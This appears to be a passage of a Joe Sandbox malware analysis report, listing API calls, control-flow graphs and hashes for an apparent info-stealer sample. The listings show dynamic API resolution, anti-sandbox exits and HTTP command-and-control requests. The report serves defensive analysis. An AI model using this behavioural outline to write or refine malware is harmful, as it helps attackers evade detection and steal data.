27218->27219 27220 6a500d 27219->27220 27221 6a5005 lstrcpy 27219->27221 27222 6a5014 lstrlen 27220->27222 27221->27220 27223 6a502a 27222->27223 27224 6a5036 lstrcpy lstrcat 27223->27224 27225 6a504d 27223->27225 27224->27225 27226 6a5079 27225->27226 27227 6a5071 lstrcpy 27225->27227 27228 6a5080 lstrlen 27226->27228 27227->27226 27229 6a509b 27228->27229 27230 6a50ac lstrcpy lstrcat 27229->27230 27231 6a50bc 27229->27231 27230->27231 27232 6a50da lstrcpy lstrcat 27231->27232 27233 6a50ed 27231->27233 27232->27233 27234 6a510b lstrcpy 27233->27234 27235 6a5113 27233->27235 27234->27235 27236 6a5121 InternetConnectA 27235->27236 27236->27180 27237 6a5150 HttpOpenRequestA 27236->27237 27238 6a518b 27237->27238 27239 6a54b1 InternetCloseHandle 27237->27239 27392 6c7310 lstrlen 27238->27392 27239->27180 27243 6a51a4 27400 6c72c0 27243->27400 27246 6c7280 lstrcpy 27247 6a51c0 27246->27247 27248 6c7310 3 API calls 27247->27248 27249 6a51d5 27248->27249 27250 6c7280 lstrcpy 27249->27250 27251 6a51de 27250->27251 27252 6c7310 3 API calls 27251->27252 27253 6a51f4 27252->27253 27254 6c7280 lstrcpy 27253->27254 27255 6a51fd 27254->27255 27256 6c7310 3 API calls 27255->27256 27257 6a5213 27256->27257 27258 6c7280 lstrcpy 27257->27258 27259 6a521c 27258->27259 27260 6c7310 3 API calls 27259->27260 27261 6a5231 27260->27261 27262 6c7280 lstrcpy 27261->27262 27263 6a523a 27262->27263 27264 6c72c0 2 API calls 27263->27264 27265 6a524d 27264->27265 27266 6c7280 lstrcpy 27265->27266 27267 6a5256 27266->27267 27268 6c7310 3 API calls 27267->27268 27269 6a526b 27268->27269 27270 6c7280 lstrcpy 27269->27270 27271 6a5274 27270->27271 27272 6c7310 3 API calls 27271->27272 27273 6a5289 27272->27273 27274 6c7280 lstrcpy 27273->27274 27275 6a5292 27274->27275 27276 6c72c0 2 API calls 27275->27276 27277 6a52a5 27276->27277 27278 6c7280 lstrcpy 27277->27278 27279 6a52ae 27278->27279 27280 6c7310 3 API calls 27279->27280 27281 6a52c3 27280->27281 27282 6c7280 lstrcpy 27281->27282 27283 6a52cc 27282->27283 27284 6c7310 3 API calls 27283->27284 27285 6a52e2 27284->27285 27286 6c7280 lstrcpy 27285->27286 27287 6a52eb 27286->27287 27288 6c7310 3 API calls 27287->27288 27289 6a5301 27288->27289 27290 6c7280 lstrcpy 27289->27290 27291 6a530a 27290->27291 27292 6c7310 3 API calls 27291->27292 27293 6a531f 27292->27293 27294 6c7280 lstrcpy 27293->27294 27295 6a5328 27294->27295 27296 6c72c0 2 API calls 27295->27296 27297 6a533b 27296->27297 27298 6c7280 lstrcpy 27297->27298 27299 6a5344 27298->27299 27300 6a537c 27299->27300 27301 6a5370 lstrcpy 27299->27301 27302 6c72c0 2 API calls 27300->27302 27301->27300 27303 6a538a 27302->27303 27304 6c72c0 2 API calls 27303->27304 27305 6a5397 27304->27305 27306 6c7280 lstrcpy 27305->27306 27307 6a53a1 27306->27307 27308 6a53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27307->27308 27309 6a549c InternetCloseHandle 27308->27309 27313 6a53f2 27308->27313 27311 6a54ae 27309->27311 27310 6a53fd lstrlen 27310->27313 27311->27239 27312 6a542e lstrcpy lstrcat 27312->27313 27313->27309 27313->27310 27313->27312 27314 6a5473 27313->27314 27315 6a546b lstrcpy 27313->27315 27316 6a547a InternetReadFile 27314->27316 27315->27314 27316->27309 27316->27313 27318 6b8cc6 ExitProcess 27317->27318 27333 6b8ccd 27317->27333 27319 6b8ee2 27319->26208 27320 6b8e88 lstrlen 27320->27333 27321 6b8e6f StrCmpCA 27321->27333 27322 6b8d06 lstrlen 27322->27333 27323 6b8d84 StrCmpCA 27323->27333 27324 6b8da4 StrCmpCA 27324->27333 27325 6b8d5a lstrlen 27325->27333 27326 6b8dbd StrCmpCA 27326->27333 27327 6b8ddd StrCmpCA 27327->27333 27328 6b8dfd StrCmpCA 27328->27333 27329 6b8e1d StrCmpCA 27329->27333 27330 6b8e3d StrCmpCA 27330->27333 27331 6b8d30 lstrlen 27331->27333 27332 6b8e56 StrCmpCA 27332->27333 27333->27319 27333->27320 27333->27321 27333->27322 27333->27323 27333->27324 27333->27325 27333->27326 27333->27327 27333->27328 27333->27329 27333->27330 27333->27331 27333->27332 27334 6b8ebb lstrcpy 27333->27334 27334->27333 27335->26214 27336->26216 27337->26222 27338->26224 27339->26230 27340->26232 27341->26238 27342->26242 27343->26248 27344->26250 27345->26254 27346->26268 27347->26272 27348->26271 27349->26267 27350->26271 27351->26289 27352->26274 27353->26275 27354->26279 27355->26285 27356->26286 27357->26292 27358->26300 27359->26302 27360->26325 27361->26329 27362->26328 27363->26324 27364->26328 27365->26338 27368 6a161f 27367->27368 27369 6a1633 27368->27369 27370 6a162b lstrcpy 27368->27370 27371 6a164d lstrcpy 27369->27371 27372 6a1655 27369->27372 27370->27369 27371->27372 27373 6a166f lstrcpy 27372->27373 27374 6a1677 27372->27374 27373->27374 27375 6a1699 27374->27375 27376 6a1691 lstrcpy 27374->27376 27375->27060 27376->27375 27378 6c71e6 27377->27378 27379 6c71fc lstrcpy 27378->27379 27380 6c2860 27378->27380 27379->27380 27380->26203 27382 6a4bd0 27381->27382 27382->27382 27383 6a4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27382->27383 27384 6a4c41 27383->27384 27384->27168 27386 6c3e83 27385->27386 27387 6c3e9f lstrcpy 27386->27387 27388 6c3eab 27386->27388 27387->27388 27389 6c3ecd lstrcpy 27388->27389 27390 6c3ed5 GetSystemTime 27388->27390 27389->27390 27391 6c3ef3 27390->27391 27391->27187 27394 6c732d 27392->27394 27393 6a519b 27396 6c7280 27393->27396 27394->27393 27395 6c733d lstrcpy lstrcat 27394->27395 27395->27393 27397 6c728c 27396->27397 27398 6c72b4 27397->27398 27399 6c72ac lstrcpy 27397->27399 27398->27243 27399->27398 27402 6c72dc 27400->27402 27401 6a51b7 27401->27246 27402->27401 27403 6c72ed lstrcpy lstrcat 27402->27403 27403->27401 27409 6b4c77 295 API calls 27431 6c31f0 GetSystemInfo wsprintfA 27455 6b8615 48 API calls 27411 6be049 147 API calls 27416 6c3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27447 6b8615 49 API calls 27456 6c33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27427 6b3959 244 API calls 27432 6b01d9 126 API calls 27417 6c2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27412 6c2853 lstrcpy 27448 6b4b29 303 API calls 27457 6b23a9 298 API calls 27418 6c30a0 GetSystemPowerStatus 27433 6c29a0 GetCurrentProcess IsWow64Process 27437 6af639 144 API calls 27439 6a16b9 200 API calls 27449 6abf39 177 API calls 27458 6babb2 120 API calls 27429 6c3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27419 6b8c88 16 API calls 27451 6ab309 98 API calls 27420 6c2880 10 API calls 27421 6c4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27422 6c3480 6 API calls 27440 6c3280 7 API calls 27404 8f0e62 27405 8f0fa2 VirtualAlloc 27404->27405 27459 6b8615 47 API calls 27423 6b2499 290 API calls 27460 6adb99 671 API calls 27430 6c4e35 7 API calls 27414 6c2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27452 6c9711 MultiByteToWideChar MultiByteToWideChar MultiByteToWideChar MultiByteToWideChar __setmbcp

                                Executed Functions

                                Function 006A4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A4C7F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4CD2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4D05
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4D35
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4D73
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006A4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 6552703953dfc7245c0b8358f3294ac3cf96cea8a480ca2f2b5b12dae08707b8
                                • Instruction ID: 2605c5b70f304265647293223283fda87585215ddeb1cad2dbebd8fb725df8b7
                                • Opcode Fuzzy Hash: 6552703953dfc7245c0b8358f3294ac3cf96cea8a480ca2f2b5b12dae08707b8
                                • Instruction Fuzzy Hash: C9529D71A016169BCB21FFA8DC45BAEB7BABF45300F084129F906A7251DB74ED028F94
                                Function 006C6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 6c6390-6c63bd GetPEB 2126 6c65c3-6c6623 LoadLibraryA * 5 2125->2126 2127 6c63c3-6c65be call 6c62f0 GetProcAddress * 20 2125->2127 2129 6c6638-6c663f 2126->2129 2130 6c6625-6c6633 GetProcAddress 2126->2130 2127->2126 2132 6c666c-6c6673 2129->2132 2133 6c6641-6c6667 GetProcAddress * 2 2129->2133 2130->2129 2134 6c6688-6c668f 2132->2134 2135 6c6675-6c6683 GetProcAddress 2132->2135 2133->2132 2137 6c66a4-6c66ab 2134->2137 2138 6c6691-6c669f GetProcAddress 2134->2138 2135->2134 2139 6c66ad-6c66d2 GetProcAddress * 2 2137->2139 2140 6c66d7-6c66da 2137->2140 2138->2137 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(77190000,01331658), ref: 006C63E9
                                • GetProcAddress.KERNEL32(77190000,01331670), ref: 006C6402
                                • GetProcAddress.KERNEL32(77190000,01331730), ref: 006C641A
                                • GetProcAddress.KERNEL32(77190000,01331760), ref: 006C6432
                                • GetProcAddress.KERNEL32(77190000,013392A8), ref: 006C644B
                                • GetProcAddress.KERNEL32(77190000,013265D8), ref: 006C6463
                                • GetProcAddress.KERNEL32(77190000,01326898), ref: 006C647B
                                • GetProcAddress.KERNEL32(77190000,013316B8), ref: 006C6494
                                • GetProcAddress.KERNEL32(77190000,01331718), ref: 006C64AC
                                • GetProcAddress.KERNEL32(77190000,01331778), ref: 006C64C4
                                • GetProcAddress.KERNEL32(77190000,01331790), ref: 006C64DD
                                • GetProcAddress.KERNEL32(77190000,013268B8), ref: 006C64F5
                                • GetProcAddress.KERNEL32(77190000,013317A8), ref: 006C650D
                                • GetProcAddress.KERNEL32(77190000,013317D8), ref: 006C6526
                                • GetProcAddress.KERNEL32(77190000,01326858), ref: 006C653E
                                • GetProcAddress.KERNEL32(77190000,01331508), ref: 006C6556
                                • GetProcAddress.KERNEL32(77190000,01331520), ref: 006C656F
                                • GetProcAddress.KERNEL32(77190000,01326878), ref: 006C6587
                                • GetProcAddress.KERNEL32(77190000,01331808), ref: 006C659F
                                • GetProcAddress.KERNEL32(77190000,01326638), ref: 006C65B8
                                • LoadLibraryA.KERNEL32(013318B0,?,?,?,006C1C03), ref: 006C65C9
                                • LoadLibraryA.KERNEL32(01331898,?,?,?,006C1C03), ref: 006C65DB
                                • LoadLibraryA.KERNEL32(01331880,?,?,?,006C1C03), ref: 006C65ED
                                • LoadLibraryA.KERNEL32(01331850,?,?,?,006C1C03), ref: 006C65FE
                                • LoadLibraryA.KERNEL32(01331838,?,?,?,006C1C03), ref: 006C6610
                                • GetProcAddress.KERNEL32(76850000,013317F0), ref: 006C662D
                                • GetProcAddress.KERNEL32(77040000,01331820), ref: 006C6649
                                • GetProcAddress.KERNEL32(77040000,01331868), ref: 006C6661
                                • GetProcAddress.KERNEL32(75A10000,013397F0), ref: 006C667D
                                • GetProcAddress.KERNEL32(75690000,013268D8), ref: 006C6699
                                • GetProcAddress.KERNEL32(776F0000,01339178), ref: 006C66B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 006C66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 006C66C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 017548ee46629936faa7d00919df82bdec1d555d15d8b16cfe6265a45b7dde15
                                • Instruction ID: 71fc0f09ecaa7b905b7369f66db24c465253022d55fb757645c42ab363d67abf
                                • Opcode Fuzzy Hash: 017548ee46629936faa7d00919df82bdec1d555d15d8b16cfe6265a45b7dde15
                                • Instruction Fuzzy Hash: 6BA11BB5A13A00EFD754DF69FD48A263BB9F788641310871BE996D3364EB34AC00DB60
                                Function 006C1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 6c1bf0-6c1c0b call 6a2a90 call 6c6390 2146 6c1c0d 2141->2146 2147 6c1c1a-6c1c27 call 6a2930 2141->2147 2148 6c1c10-6c1c18 2146->2148 2151 6c1c29-6c1c2f lstrcpy 2147->2151 2152 6c1c35-6c1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 6c1c6d-6c1c7b GetSystemInfo 2152->2156 2157 6c1c65-6c1c67 ExitProcess 2152->2157 2158 6c1c7d-6c1c7f ExitProcess 2156->2158 2159 6c1c85-6c1ca0 call 6a1030 call 6a10c0 GetUserDefaultLangID 2156->2159 2164 6c1cb8-6c1cca call 6c2ad0 call 6c3e10 2159->2164 2165 6c1ca2-6c1ca9 2159->2165 2171 6c1ccc-6c1cde call 6c2a40 call 6c3e10 2164->2171 2172 6c1ce7-6c1d06 lstrlen call 6a2930 2164->2172 2165->2164 2166 6c1cb0-6c1cb2 ExitProcess 2165->2166 2171->2172 2185 6c1ce0-6c1ce1 ExitProcess 2171->2185 2178 6c1d08-6c1d0d 2172->2178 2179 6c1d23-6c1d40 lstrlen call 6a2930 2172->2179 2178->2179 2180 6c1d0f-6c1d11 2178->2180 2186 6c1d5a-6c1d7b call 6c2ad0 lstrlen call 6a2930 2179->2186 2187 6c1d42-6c1d44 2179->2187 2180->2179 2183 6c1d13-6c1d1d lstrcpy lstrcat 2180->2183 2183->2179 2193 6c1d7d-6c1d7f 2186->2193 2194 6c1d9a-6c1db4 lstrlen call 6a2930 2186->2194 2187->2186 2188 6c1d46-6c1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2196 6c1d81-6c1d85 2193->2196 2199 6c1dce-6c1deb call 6c2a40 lstrlen call 6a2930 2194->2199 2200 6c1db6-6c1db8 2194->2200 2196->2194 2198 6c1d87-6c1d94 lstrcpy lstrcat 2196->2198 2198->2194 2206 6c1ded-6c1def 2199->2206 2207 6c1e0a-6c1e0f 2199->2207 2200->2199 2201 6c1dba-6c1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 6c1df1-6c1df5 2206->2208 2209 6c1e16-6c1e22 call 6a2930 2207->2209 2210 6c1e11 call 6a2a20 2207->2210 2208->2207 2212 6c1df7-6c1e04 lstrcpy lstrcat 2208->2212 2215 6c1e24-6c1e26 2209->2215 2216 6c1e30-6c1e66 call 6a2a20 * 5 OpenEventA 2209->2216 2210->2209 2212->2207 2215->2216 2217 6c1e28-6c1e2a lstrcpy 2215->2217 2228 6c1e8c-6c1ea0 CreateEventA call 6c1b20 call 6bffd0 2216->2228 2229 6c1e68-6c1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 6c1ea5-6c1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                APIs
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331658), ref: 006C63E9
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331670), ref: 006C6402
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331730), ref: 006C641A
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331760), ref: 006C6432
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013392A8), ref: 006C644B
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013265D8), ref: 006C6463
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01326898), ref: 006C647B
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013316B8), ref: 006C6494
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331718), ref: 006C64AC
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331778), ref: 006C64C4
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331790), ref: 006C64DD
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013268B8), ref: 006C64F5
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013317A8), ref: 006C650D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C1C2F
                                • ExitProcess.KERNEL32 ref: 006C1C67
                                • GetSystemInfo.KERNEL32(?), ref: 006C1C71
                                • ExitProcess.KERNEL32 ref: 006C1C7F
                                  • Part of subcall function 006A1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006A1046
                                  • Part of subcall function 006A1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 006A104D
                                  • Part of subcall function 006A1030: ExitProcess.KERNEL32 ref: 006A1058
                                  • Part of subcall function 006A10C0: GlobalMemoryStatusEx.KERNEL32 ref: 006A10EA
                                  • Part of subcall function 006A10C0: ExitProcess.KERNEL32 ref: 006A1114
                                • GetUserDefaultLangID.KERNEL32 ref: 006C1C8F
                                • ExitProcess.KERNEL32 ref: 006C1CB2
                                • ExitProcess.KERNEL32 ref: 006C1CE1
                                • lstrlen.KERNEL32(013391C8), ref: 006C1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1D15
                                • lstrcat.KERNEL32(00000000,013391C8), ref: 006C1D1D
                                • lstrlen.KERNEL32(006D4B98), ref: 006C1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D48
                                • lstrcat.KERNEL32(00000000,006D4B98), ref: 006C1D54
                                • lstrlen.KERNEL32(00000000), ref: 006C1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1D94
                                • lstrlen.KERNEL32(006D4B98), ref: 006C1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1DBC
                                • lstrcat.KERNEL32(00000000,006D4B98), ref: 006C1DC8
                                • lstrlen.KERNEL32(00000000), ref: 006C1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1E04
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 7778a0a1f73e30a64187a89c653ea8bcd2a93d1200b7ae415173037f0afba976
                                • Instruction ID: bae6e5f3bd5cf866b55d6fb0967fbbc11508e87c89d8a678e97a200f137ec0ce
                                • Opcode Fuzzy Hash: 7778a0a1f73e30a64187a89c653ea8bcd2a93d1200b7ae415173037f0afba976
                                • Instruction Fuzzy Hash: F1719E31542616ABCB60BBA5DC59FBE7B6BFF06701F04411EF946DA2A2DF349C018B60
                                Function 006A6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 6a6c40-6a6c64 call 6a2930 2237 6a6c66-6a6c6b 2234->2237 2238 6a6c75-6a6c97 call 6a4bc0 2234->2238 2237->2238 2239 6a6c6d-6a6c6f lstrcpy 2237->2239 2242 6a6caa-6a6cba call 6a2930 2238->2242 2243 6a6c99 2238->2243 2239->2238 2247 6a6cc8-6a6cf5 InternetOpenA StrCmpCA 2242->2247 2248 6a6cbc-6a6cc2 lstrcpy 2242->2248 2244 6a6ca0-6a6ca8 2243->2244 2244->2242 2244->2244 2249 6a6cfa-6a6cfc 2247->2249 2250 6a6cf7 2247->2250 2248->2247 2251 6a6ea8-6a6ebb call 6a2930 2249->2251 2252 6a6d02-6a6d22 InternetConnectA 2249->2252 2250->2249 2261 6a6ec9-6a6ee0 call 6a2a20 * 2 2251->2261 2262 6a6ebd-6a6ebf 2251->2262 2253 6a6d28-6a6d5d HttpOpenRequestA 2252->2253 2254 6a6ea1-6a6ea2 InternetCloseHandle 2252->2254 2256 6a6d63-6a6d65 2253->2256 2257 6a6e94-6a6e9e InternetCloseHandle 2253->2257 2254->2251 2259 6a6d7d-6a6dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 6a6d67-6a6d77 InternetSetOptionA 2256->2260 2257->2254 2263 6a6daf-6a6dd3 call 6c71e0 call 6a2a20 * 2 2259->2263 2264 6a6dd4-6a6de4 call 6c3d90 2259->2264 2260->2259 2262->2261 2265 6a6ec1-6a6ec3 lstrcpy 2262->2265 2264->2263 2273 6a6de6-6a6de8 2264->2273 2265->2261 2276 6a6dee-6a6e07 InternetReadFile 2273->2276 2277 6a6e8d-6a6e8e InternetCloseHandle 2273->2277 2276->2277 2279 6a6e0d 2276->2279 2277->2257 2281 6a6e10-6a6e15 2279->2281 2281->2277 2283 6a6e17-6a6e3d call 6c7310 2281->2283 2286 6a6e3f call 6a2a20 2283->2286 2287 6a6e44-6a6e51 call 6a2930 2283->2287 2286->2287 2291 6a6e53-6a6e57 2287->2291 2292 6a6e61-6a6e8b call 6a2a20 InternetReadFile 2287->2292 2291->2292 2294 6a6e59-6a6e5b lstrcpy 2291->2294 2292->2277 2292->2281 2294->2292
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A6C6F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6CC2
                                • InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A6CD5
                                • StrCmpCA.SHLWAPI(?,0133F3B0), ref: 006A6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006A6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,0133ED58,00000000,00000000,-00400100,00000000), ref: 006A6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006A6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006A6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006A6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006A6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 006A6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 006A6E8E
                                • InternetCloseHandle.WININET(?), ref: 006A6E98
                                • InternetCloseHandle.WININET(00000000), ref: 006A6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
